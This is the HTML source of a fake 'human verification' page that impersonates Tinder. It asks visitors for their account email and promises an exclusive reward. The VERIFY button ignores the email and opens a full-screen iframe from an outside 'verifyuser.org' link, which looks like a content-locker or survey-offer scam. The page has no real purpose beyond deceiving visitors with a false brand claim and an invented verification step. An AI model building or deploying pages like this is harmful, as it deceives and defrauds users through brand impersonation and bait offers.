<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>HUMAN VERIFICATION</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
      #main {
        background: url("/mainbg.jpeg") no-repeat center/cover;
      }

      /* Overlay and iframe styling */
      #iframe-overlay {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: rgba(0, 0, 0, 0.5); /* Semi-transparent background */
        display: flex;
        justify-content: center;
        align-items: center;
        z-index: 1000; /* Ensure it appears on top */
        display: none; /* Initially hidden */
      }

      #iframe-overlay iframe {
        width: 80%; /* Adjust as needed */
        height: 80%; /* Adjust as needed */
        border: none;
        background: transparent; /* Ensure iframe background is transparent */
      }
    </style>
    <meta name="robots" content="noindex, nofollow" />
  </head>
  <body>
    <div id="iframe-overlay" class="iframe-overlay"></div>
    <div
      id="main"
      class="h-screen flex justify-center items-center text-center relative"
    >
      <div
        class="absolute text-white bg-black rounded-lg p-5 lg:w-2/6 w-fit mx-5"
      >
        <h1
          class="mb-5 text-2xl font-bold flex items-center justify-center text-pink-600"
        >
          !HUMAN VERIFICATION! :(
        </h1>
        <p>
          Enter your E-mail associated with your
          <strong class="text-pink-500">Tinder</strong> account.
        </p>
        <p>
          After verification, check your tinder account for your exclusive
          <strong class="text-pink-600 mt-2">TINDER.</strong>
        </p>
        <input
          type="email"
          placeholder="Enter your email"
          class="px-3 py-2 rounded text-pink-600 mt-2 w-2/3"
        />
        <br />
        <button
          class="bg-pink-600 px-5 py-2 mt-5 hover:bg-pink-700 hover:text-white"
          onclick="verify()"
        >
          VERIFY
        </button>
      </div>
    </div>
  </body>

  <script>
    function verify() {
      // Show the loader
      document.getElementById("iframe-overlay").innerHTML =
        '<iframe id="lockeriframe" src="https://verifyuser.org/cl/i/g6k863" frameborder="0" class="second-row"></iframe>';

      // Insert the iframe after a delay to simulate loading time
      setTimeout(function () {
        document.getElementById("iframe-overlay").style.display = "flex"; // Show iframe overlay
      }, 100); // Adjust the delay time as needed
    }
  </script>
</html>
